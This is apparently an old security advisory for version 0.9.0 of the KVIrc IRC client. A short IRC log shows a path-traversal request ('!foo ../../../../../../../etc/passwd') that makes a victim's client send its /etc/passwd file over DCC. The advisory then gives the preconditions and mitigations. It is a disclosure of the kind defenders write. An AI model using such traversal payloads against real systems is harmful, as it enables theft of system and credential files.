COMMAND

    kvirc

SYSTEMS AFFECTED

    Those using kvirc irc client

PROBLEM

    Rodolfo Garcia Peņas posted following.   The irc client Kvirc  has
    this bug:

    foo> his
    kix>/ctcp foo
    -:- CTCP VERSION reply from foo: Running KVirc 0.9.0 by Szymon
              'Pragma@ircnet' Stefanek <kvirc@tin.it> MASH War By iNGENI{} 0.95
              !!!! http://move.to/ingenio Be afraid, this is not MiRc, esto es
              LINUX!
    <kix> !foo ../../../../../../../etc/passwd
    -:- DCC GET (passwd) request from
              foo[~var@ipaddress.org
              [62.81.101.74:1043]] 778 bytes
    <kix>/dcc
    #  | Type  | Nick      | Percent Complete        | K/s   | File
    ------------------------------------------------------------------------------
    #2   GET     foo         Offer                     N/A     passwd
    <kix>/dcc get foo
    -:- DCC GET with foo[62.81.101.74:1043] established
    -:- DCC GET:passwd [778bytes] from foo completed in 0.9885 secs (787.1
              bytes/sec)

    This is bug of the 0.9.0 version  of KVIrc.  Anyway, it is not  so
    easy to download  someone's /etc/passwd.   First he must  have the
    "Listen  to  !nick  <soundname>  requests"  option  enabled (it is
    disabled by  default).   Second ,  the "offending"  user must know
    where  is  located  the  kvirc  "local  directory" on the victim's
    machine to be able to place  the right path to /etc/passwd.   Only
    version 0.9.0 of KVIrc is vulnerable to this attack.

SOLUTION

    If  you  are  still  using  KVIrc  0.9.0  you  have  the following
    solutions:

    1. Disable the "Listen  to !nick <soundname> requests."  option in
       the "Sound" tab of  the Misc options dialog.   (Or better ,  do
       not enable it)

    2. Get  the latest  KVIrc sources  from http://www.kvirc.org  (The
       latest public release is beta2) or from the anonymous cvs  (see
       http://www.kvirc.org/cvs.html).